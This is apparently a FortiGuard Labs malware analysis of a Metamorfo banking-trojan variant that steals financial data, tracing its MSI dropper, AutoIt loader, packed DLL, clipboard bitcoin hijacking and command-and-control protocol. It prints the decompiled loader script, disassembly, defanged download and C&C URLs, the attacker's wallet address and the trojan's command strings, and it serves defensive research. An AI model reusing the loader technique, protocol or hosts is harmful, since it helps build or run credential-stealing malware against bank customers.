Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries

FortiGuard Labs Threat Analysis

 

Affected platforms:                   Windows
Impacted parties:                       Online Financial Institutions
Impact:                                      Theft of financial information

Severity level:                           High

Metamorfo is a malware family that was observed targeting the customers of online financial institutions. Recently, FortiGuard Labs captured two different Metamorfo variants. We have already published an analysis blog for the first, which only targets the customers of Brazilian financial institutions. 

This second Metamorfo variant targets the customers of even more financial institutions across multiple countries. In this post you can see how it infects the machines of its victims and what it is able to do on a victim’s machine, including how it collects data and communicates with its command and control (C&C) server, as well as what C&C commands it supports.

Starting from the Captured Sample 

The captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS.

Analyzing this latest MSI file, I discovered that it also has a stream with the same name –“!_StringData” – where I found a piece of JavaScript code that had been mixed in with a huge amount of garbage strings. After I extracted and de-obfuscated the JavaScript code, it was easy to see what the code does. Figure 1 is a code snippet that shows the key functions of that JavaScript code being used.

 

Figure 1. JavaScript code snippet extracted from the stream “!_StringData“

It downloads a file from the URL "hxxp[:]//www[.]chmsc[.]edu[.]ph/library/modules/down/op57.lts", which is actually a ZIP file containing three files. It then gets decompressed into a newly-created random string folder (in this case, “RrRbiebL”) under “C:”. Also, the three decompressed files are renamed with random strings, which in this analysis were “cMejBlQe.exe”, “M6WnYxAh” and “YvSVUyps.dll”.  Figure 2 shows the folder information.

Figure 2. Three decompressed files in a random name folder

These three files are executed in the command line: "C:RrRbiebLcMejBlQe.exe   C:RrRbiebLM6WnYxAh C:RrRbiebLYvSVUyps.dll”. You may have noticed in Figure 1 that it also added itself into the auto-run group in the victim’s system registry. This ensure that it runs automatically whenever the infected system starts. Figure 3 is a screenshot of the auto-run item in the system registry, whose value is just the above command line.

Figure 3. Added into auto-run group in the system registry

AutoIt Script Runs Metamorfo

“C:RrRbiebLcMejBlQe.exe” is run with the parameters “C:RrRbiebLM6WnYxAh C:RrRbiebLYvSVUyps.dll”. Through my analysis I learned that the file “cMejBlQe.exe” is an AutoIt script execution program, whose original name was “AutoIt3.exe”. The file “M6WnYxAh” is a compiled binary AutoIt script file (i.e. “.A3X” file), and “YvSVUyps.dll” includes the major body of this Metamorfo variant.

AutoIt has been observed being abused by a number of malware families for malicious purposes in the past. The reason for using AutoIt could be to bypass antivirus detection.

Decompiling the file “M6WnYxAh” reveals its source code:

SLEEP(2000)

_SLEEP(2000)

SLEEP(2000)

_SLEEP(2000)

GLOBAL $NPYVKYZFH1Z9T8E5CL48UGNZ878HTHO91S63AH=$CMDLINE[1]

GLOBAL $KPH98S477U6K32TXPN3F8UBVSHZ=DLLOPEN($NPYVKYZFH1Z9T8E5CL48UGNZ878HTHO91S63AH)

DLLCALL($KPH98S477U6K32TXPN3F8UBVSHZ,”Int”,”B1OWOEFK3SBYS0ETX4XXHRNV7SZGYFTU“)

FUNC _SLEEP($IDELAY)

            DLLCALL(“Kernel32.dll”,”none”,”Sleep”,”dword”,$IDELAY)

ENDFUNC

It pauses 8 seconds at first. Then it loads a DLL file from the path $CMDLINE[1], which is the last parameter in the command line; i.e. “C:RrRbiebLYvSVUyps.dll”. It continues to call an export function of the DLL file named “B1OWOEFK3SBYS0ETX4XXHRNV7SZGYFTU”. After that, the infected victim machine is controlled by the DLL code.

Analysis of the Main Part of Metamorfo

Let’s now take a look at the file “YvSVUyps.dll”. From Figure 4, we can see that the DLL file is protected by the packer “VMProtect v3.00-3.3.1”. VMProtect is a very strong packer that supports dynamic code protection when the target process is running. This creates a big challenge for analysts. For example, all API addresses are hidden and are dynamically calculated before calling.

Figure 4. Analzying YvSVUyps.dll with an analysis tool

Once it ran, I dumped the restored real code from memory. By analyzing its ASM code, I also learned that it was compiled by Borland Delphi, just like the previous variant I analyzed.

Now it’s time to see what major tasks it will perform on a victim’s system.

After the code is restored by VMProtect, the FormCreate() function is called – which can be considered to be the Main() function.

It terminates running browsers, such as Microsoft IE, Mozilla Firefox, Google Chrome, Microsoft Edge and Opera, by killing the following processes: "iexplore.exe", "firefox.exe", "chrome.exe", "microsoftedge.exe", and "opera.exe". The process name strings and other most constant strings in the variant are encrypted using the same method as in the previous variant, but with different decryption keys.

[…]

022AE2BA     lea     edx, [ebp+var_30]

022AE2BD     mov     eax, offset a015f924af437_0 

022AE2C2     call    decrypt_fun     

022AE2C7     mov     edx, [ebp+var_30]

022AE2CA     lea     eax, [ebp+var_2C]

022AE2CD     call    str_copy_Ascii_Unicode

022AE2D2     mov     edx, [ebp+var_2C]     ; de=>  “iexplore.exe”

022AE2D5     mov     eax, [ebp+var_4] 

022AE2D8     call    _TerminateProcess 

022AE2DD     lea     edx, [ebp+var_38]

022AE2E0     mov     eax, offset a5af5093ad16e_0 

022AE2E5     call    decrypt_fun     

022AE2EA     mov     edx, [ebp+var_38]

022AE2ED     lea     eax, [ebp+var_34]

022AE2F0     call    str_copy_Ascii_Unicode ; 

022AE2F5     mov     edx, [ebp+var_34]    ; de=> “firefox.exe”

022AE2F8     mov     eax, [ebp+var_4] 

022AE2FB     call    _TerminateProcess 

022AE300     lea     edx, [ebp+var_40]

022AE303     mov     eax, offset aA233cd013efd_0 

022AE308     call    decrypt_fun     

022AE30D     mov     edx, [ebp+var_40]

022AE310     lea     eax, [ebp+var_3C]

022AE313     call    str_copy_Ascii_Unicode ; 

022AE318     mov     edx, [ebp+var_3C]    ; de=> “chrome.exe”

022AE31B     mov     eax, [ebp+var_4] 

022AE31E     call    _TerminateProcess 

022AE323     lea     edx, [ebp+var_48]

022AE326     mov     eax, offset aC9023de11adf_0 

022AE32B     call    decrypt_fun     

022AE330     mov     edx, [ebp+var_48]

022AE333     lea     eax, [ebp+var_44]

022AE336     call    str_copy_Ascii_Unicode ; 

022AE33B     mov     edx, [ebp+var_44]     ; de=> “microsoftedge.exe”

022AE33E     mov     eax, [ebp+var_4] 

022AE341     call    _TerminateProcess 

022AE346     lea     edx, [ebp+var_50]

022AE349     mov     eax, offset a84c66187b74f_0 

022AE34E     call    decrypt_fun     

022AE353     mov     edx, [ebp+var_50]

022AE356     lea     eax, [ebp+var_4C]

022AE359     call    str_copy_Ascii_Unicode ; 

022AE35E     mov     edx, [ebp+var_4C]    ; de=> “opera.exe”

022AE361     mov     eax, [ebp+var_4] 

022AE364     call    _TerminateProcess 

[…]

This piece of ASM code shows that it calls a function to decrypt the process name strings and then calls the function _TerminateProcess() to kill all the matched processes from the process list.

It then modifies several registry key values to disable the IE browser’s functions such as auto-complete, auto-suggest, etc. The disabled keys are: "Use FormSuggest", "FormSuggest Passwords", "FormSuggest PW Ask" under the sub-key “HKCUSoftwareMicrosoftInternet ExplorerMain”, and "AutoSuggest" under the sub-key "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAutoComplete".

What is the purpose of killing the browsers and disabling their auto-complete and auto-suggest functions? This action forces the victim to hand-enter data without auto-complete, such as whole URLs, along with login-name, password, and so on in the browser. This allows the malware’s key logger function to record the largest number of actions from the victim’s input.

It also collects information such as the OS version, Computer Name, installed AV software, and so on from victim’s system. 

If it is running on an infected machine for the first time (depending on whether a flag file exists), it sends a POST packet to its command-and-control (C&C) server informing it that a machine has been infected. Figure 5 shows the details of that packet.

Figure 5. Screenshot of a POST packet to the C&C server

The URL “hxxp[:]//escapuliu[.]com/happynewyear/EYHS2BZM31D225Q.php” was previously decrypted, and the body of this packet contains the victim’s system information. Some of the values are base64 encoded. After decoding, the data looks like this: 

vv=OP57–06-01&vw=&mods=&uname=*********V-PC&cname=N-96&os=Windows 7 Ultimate6.17601-32&is=&iss=IE.AssocFile.HTM&iav= microsoft security essentials

vv=OP57–06-01” is the version information of Metamorfo.

mods=” records whether IBM Trusteer Rapport is running, which is used to protect users from malware.

uname=*********V-PC” is the victim’s computer name.

cname=N-96” is a value read out from the system registry.

os=Windows 7 Ultimate6.17601-32” contains the infected OS version and platform.

iss=IE.AssocFile.HTM” indicates the victim’s default browser, which in this case is IE.

iav= microsoft security essentials” is a list of AV software that the victim has installed.

 

Timer Functions

As with the previous variant, this one also uses Timers to perform its tasks. At the end of the FormCreate() function it starts two Timers. The first Timer is used to monitor a bitcoin wallet address in the system clipboard, and the other is used to detect whether or not the victim is accessing a financial institution website. I will elaborate on both of these below.

Bitcoin Address Timer Function

This function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet address. If yes, it overwrites the wallet address with the attacker’s. 

Figure 6. Calling the API SetClipboardData() to overwrite the bitcoin wallet address

Figure 6 shows the calling of the API SetClipboardData(), whose second parameter is the attacker’s wallet address ("163McXwBrc9S7JzbgegzVuw7QTJ9H1dQj7") used to replace the original one in the system clipboard. 

Usually, users copy&paste the wallet address to make a bitcoin transfer. In this variant, Metamorfo detects and overwrites the target wallet in the clipboard. In this way, it attempts to make the victim unknowingly transfer their bitcoin to the attacker’s bitcoin wallet address ("163McXwBrc9S7JzbgegzVuw7QTJ9H1dQj7").

Financial institution Timer Function

It then calls the API EnumWindows() function to enumerate all windows from the victim’s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this:  “{14H long random string}+windows title”. All the mixed windows titles are added into a string list box control. It can also collect the page title of an online banking website that the victim may access in a browser.

In the timer function, it then reads out the mixed windows titles from the string list box control, one by one, to perform string matching against keywords from the targeted financial institutions. There are 32 such keywords that are used to enable matching with more than twenty financial institutions in multiple countries, including the US, Canada, Peru, Chile, Spain, Brazil, Ecuador, Mexico, and others. For safety reasons, I will not mention the specified keywords or the names of the financial institutions being targeted by this malware in this post.

Once a window title matches one of the keywords of a targeted financial institution, it connects to the C&C server, whose host is different from the one mentioned earlier.

Below is a code snippet that decrypts the C&C server host string and port number, which are “ssl[.]teamo[.]life” and “8350”.

[…]

022965F7  lea  eax, [ebp+var_18]

022965FA  mov  edx, ds:dword_235CE2C   ;encrypted host string

02296600  mov  ecx, 0

02296605  call  _WideCharToMultiByte 

0229660A  mov  eax, [ebp+var_18]

0229660D  lea  edx, [ebp+var_14]

02296610  call  decrypt_fun   ; de=> “ssl.teamo.life

02296615  mov  edx, [ebp+var_14]

02296618  lea  eax, [ebp+var_10]

0229661B  call  str_Ascii_Unicode

02296620  mov  edx, [ebp+var_10]

02296623  lea  ecx, [ebp+var_C]

02296626  mov  eax, [ebp+var_4]

02296629  call  sub_2296470  ; gethostbyname

0229662E  mov  edx, [ebp+var_C]

02296631  mov  eax, [ebp+var_4]

02296634  mov  eax, [eax+3DCh]

0229663A  call  sub_20BF29C

0229663F  lea  eax, [ebp+var_24]

02296642  mov  edx, ds:dword_235CE30  ;encrypted port number

02296648  mov  ecx, 0

0229664D  call  _WideCharToMultiByte 

02296652  mov   eax, [ebp+var_24]

02296655  lea   edx, [ebp+var_20]

02296658  call  decrypt_fun   ;; de=> “8350

0229665D  mov   edx, [ebp+var_20]

[…]

 

Command and Control with C&C Server 

When a connection is established with the C&C Server, it sends the command “<|QFUNHSNXU|>” to the server and waits for control commands to come back to execute further functions on the victim’s system.

Following is an example communication between Metamorfo and its C&C server. 

<|QFUNHSNXU|>

<|PT|>

<|tksN|>OP57–06-01-N-96<|>32 – Windows 7 Ultimate6.17601<|>********-PC – microsoft security essentials-L4N4c10n<|>********-PC<<|2//&ikILVm9ZtX!L4N4c10n

Metamorfo sent “<|QFUNHSNXU|>” to the server, and then received the control command “<|PT|>” back from the server and executed the code for this command. As you can see, it then sent the response packet “<|tksN|>”, which contains the Metamorfo version, system version, platform information, the victim’s computer name, any installed AV software, the identifier string of the matched financial institution name (“L4N4c10n”), and so on. 

NOTE: in a packet, the symbol “<|>” is kind of a delimiter, while “<<|” is an end symbol.

As with the previous variant, this Metamorfo client uses the SocketRead() function to receive and process the control commands from the C&C server for this socket. 

This Metamorfo variant supports 119 control commands in total. Here they are:

"<|YuiqkwSgot|>", "<|PT|>", "<|VOTM|>", "<|Gpsxi|>", "<|ZKXAKYWQKEHUGZJ|>", "<|lozyw|>", "<|SuaykRJ|>", "<|SuaykJI|>", "<|ztUjzwtR|>", "<|IXjzwtR|>", "<|Folder|>", "<|Files|>", "<|DownloadFile|>", "<|UploadFile|>", "dkxqdpdv", "fuobhjh", "pyfsqtpofn", "camarinho", "beijada", "cidadao", "dlulztody", "janainaa", "nnnaewhwf23nvcxx", "vanuza", "vanessa", "carmena", "petereca", "jpevtpjevtjte", "djqduidxorv", "dulhkqzprf", "vaidamole", "vadiadaum", "lzyxyzoxzdy", "baraomagao", "IbqJxbxma", "Lmatqo", "puplY", "hajluvjlY", "wlylajhyhJ", "gsxuymrle", "sjemwbgonehjexhjjexhjxh", "phjdqdfdv", "madona", "LkingWajuGhkzwu", "vkbAlcvtlY", "JtxyXLWA", "urpdzchlrdi", "JXyhylipS", "ndsoiu43098s", "snis4duo3098", "ki74yfhsag", "KxvoJJ", "Bwilmakx", "semvergonha", "mh42jkrxc3", "BwiAivbi", "vBiAiiwbwew", "Bwiqbi", "kdaf4w84fds", "iru4837fbcz", "apqi398wjx", "Bwiaqk", "mfklsjfk3049jsfd", "Bwikmn", "vpupqbd", "ulrvAkhyI", "posseco", "jpwhslAzvsI", "ihAhaP", "dsefsdfds342342", "massonaria", "kldiu4324987dyyds", "iejdskdjkfl3426232hdshdhs", "maconha", "cnirhx87ds", "b9f8vnh3f7dhvsja4", "ihAwpMhauhW", "nhfjds98743hvfavb", "mfki73t1dav", "fodiufjdo834yfdgf", "f9ksa8iuvdo", "miwey82fqq", "oropeiru23", "kmcjds09498", "ewaewqrtrrmwoa", "m94ufasjczbal", "ulzcecrvAkhocpgyI", "hslfasreweyI", "perebao", "japones3fadhh", "uhkozphslAzvsI", "HruxWkrgHHMqgbkgs", "kxsHqddeuMHgHrbgrWgk", "bisurdor", "curvaduru", "vvjpwulw", "bosteiro", "lkfjasofu4343849", "fkvoiudas98", "coichzbz", "b98djzc", "klfjs943jfs", "eaqeutmn5r", "cracreuz", "guilhermina", "ztchrhAhaP", "IIzvsI", "HAPzvsI", "juventude", "HAUHWzvsI", "KHYIzvsI", "jpwzvsI", "mljzvsI", "hruxyoiu", "COZUMEL", "COZUMARIA", "LMAimwc", "baci83427daca", "daa243bi78acc".

The following table lists most of the control commands for the main socket, along with their descriptions. From it you are able to discover what actions Metamorfo variant can perform on a victim’s machine.

 

Here is an example of the last control command, "LMAimwc".  It closes running browsers – including “Microsoft Internet Explorer”, “Google Chrome”, and “Mozilla Firefox”, displays a message, and then restarts the victim’s system. Figure 7, below, shows a screenshot of the message in the Spanish language that I’ve translated it into English.

Figure 7. The message of the control command "LMAimwc".

Solution

Fortinet customers are protected from this Metamorfo variant by FortiGuard’s Web Filtering, AntiVirus, and IPS services as follows:

The related URLs are rated as "Malicious Websites" by the FortiGuard Web Filtering service.

The MSI file is detected as "W32/Metamorfo" and blocked by the FortiGuard AntiVirus service.

The traffic between Metamorfo and its C&C server is detected by the FortiGuard IPS signature “Trojan.Metamorfo”.

IOCs:

URLs

hxxp[:]//escapuliu[.]com/happynewyear/EYHS2BZM31D225Q.php

hxxp[:]//www[.]chmsc[.]edu[.]ph/library/modules/down/op57.lts

Sample SHA-256

[view-(AVISO)2020.msi]

EB1E5EAEA4ECC04B920BBD955C16B17F3D5AC3C580EA266FF5B9D589B8B49E0C

Learn how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems. 

Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief.  

Discover how the FortiGuard Security Rating Service provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.

http://feeds.feedburner.com/fortinet/blog/threat-research

Leave a Reply